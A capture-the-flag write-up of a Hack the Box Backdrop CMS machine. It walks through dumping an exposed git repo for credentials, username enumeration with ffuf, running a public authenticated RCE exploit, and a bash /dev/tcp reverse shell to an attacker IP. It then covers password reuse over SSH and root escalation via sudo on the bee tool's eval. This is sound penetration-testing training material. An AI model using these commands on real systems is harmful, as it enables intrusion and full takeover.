Hack the Box Linux macine.
Start enumeration with rustscan and pass results to nmap which will run script,version, and OS scans.
rustscan -a 10.129.77.234 --ulimit 5000 -- -A
Identified a hidden
gitrepo and that the target is usingBackdrop CMS.
Install git-dumper and dump the repo into our pwd.
pipx install git-dumper # installs git-dumper in its own virtualized environment.
git-dumper http://10.129.77.234/.git .
This downloads a lot of files. Looking at the files we got, we have a
settings.phpfile. These config/settings files are always very important as it can show credentials, tokens, and paths of the server directory structure that we may not know about or pick up. In this case, it revealed that there ismysqlthat we can access internally, and we got the credentials to connect.
MySQL Creds.
We can attempt to use this in a login page but we need to find one first. I notice that our nmap scan found a robots.txt file. we can curl that and see what the admin does not want web crawlers to find.
curl http://10.129.77.234/robots.txt
php uses parameters to call the main index page and then fetch the file specified. It seems
?q=is the parameter that is grabbing the login page.
curl http://10.129.77.234/?q=user/login
The title confirms this is a login portal where we can the credentials gathered from the git repo.
Our credentials do not work but we do get an error message “Sorry, unrecognized username”.
I tested default creds but they did not work. We need to gather information on possible usernames and hopefully password reuse can apply here since we do have a password. The home page shows a possible username dogBackDropSystem but it did not work.
We can see though that the username is a valid user. We either need to find a password for this user or find more usernames that the password from the git repo can apply too. Typically, in these CTFs, the usernames can be found on the home page or within a directory. The directories identified in robots.txt do not have any valuable information.
We can try directory busting to see if there is any directories/files that may have username/password information.
gobuster dir -u http://10.129.77.234 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30
gobuster dir -u http://10.129.77.234 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -k -t 30
Not much here.
We need to look at other paths to scrub usernames. In OSINT, there are tools that scrub social media profiles. This may be possible as well in this CMS that we know is installed. Checking github, we do get a repo that has a script that can list valid usernames. Let’s test it.
python BackDropScan.py --url http://10.129.77.234/?q=accounts --userslist /usr/share/seclists/Usernames/Names/names.txt --userenum
It hangs every time and gives us no output. I’ve tried different variations/paths for this and all of them hang.
Looking at the source code, we can see what the script is trying to do and what they are targeting.
It looks like it is using a
Getrequest to query/?q=accountsand it is fuzzing theusernamewith our specified username list.
We can Fuzz these usernames with the ffuf tool.
ffuf -w /usr/share/seclists/Usernames/Names/names.txt -u http://10.129.77.234/?q=accounts/FUZZ
This did work and we do have more names.
Testing for password reuse, the user tiffany has administrative access.
We can check for public CVEs. This is the one I came across that worked for me after failing with another one. GitHub – rvizx/backdrop-rce: Backdrop CMS 1.27.1 Authenticated Remote Code Execution (RCE) – PoC Exploit
Run the exploit.
python3 exploit.py http://10.129.77.234 tiffany BackDropJ2024DS2024
Module Error.
We can install this module.
apt search requests-toolbelt
apt install python3-requests-toolbelt
Should be good now.
Run again.
python3 exploit.py http://10.129.77.234 tiffany BackDropJ2024DS2024
It says root@10.129.77.134. I thought we were done but we are actually the user
www-data.
Getting a revshell would be better so we can set up a listener and run a revshell payload.
# kali
nc -nvlp 9001
# Target
bash -c 'bash -i >& /dev/tcp/10.10.14.160/4444 0>&1'
This is more stable.
The credentials we found for mysql in the git repo belonged to a root user. There is always a possibility of password reuse so we can check the users on the system and test it against root and the others we can find.
cat /etc/passwd
users –> root, johncusack, and jobert.
We can attempt to login with ssh. I tested password reuse against all the users and we get access with johncusack. The first thing I like to check is if the user has sudo permissions that we can use to priv esc.
ssh johncusack@10.129.79.234
# enter passwd
We can use the binary
beeas a superuser.
I like checking GTFObins for a quick reference.
No luck.
A quick google search and with some help of AI I found this:
Easy enough. I want to check what the
evalargument is first.
/usr/local/bin/bee -h | grep -A 1 "eval" # The -A flag tells grep to print the matching line AND the next N lines
So it allows us to execute php code. It also shows that the php: portion of the ai reponse is not required. The other thing is I am not sure what “after bootstrapping Backdrop” is referring to. Let’s test the command and debug from there.
sudo /usr/local/bin/bee eval 'system("/bin/sh");'
That bootstrap is an issue. Looking into it I found this.
If it is looking for the “initial content and configuration” I assume that means the root directory.
We can add the root directory and continue from there.
sudo /usr/local/bin/bee --root=/var/www/html eval 'system("/bin/bash");'
Pwn3d!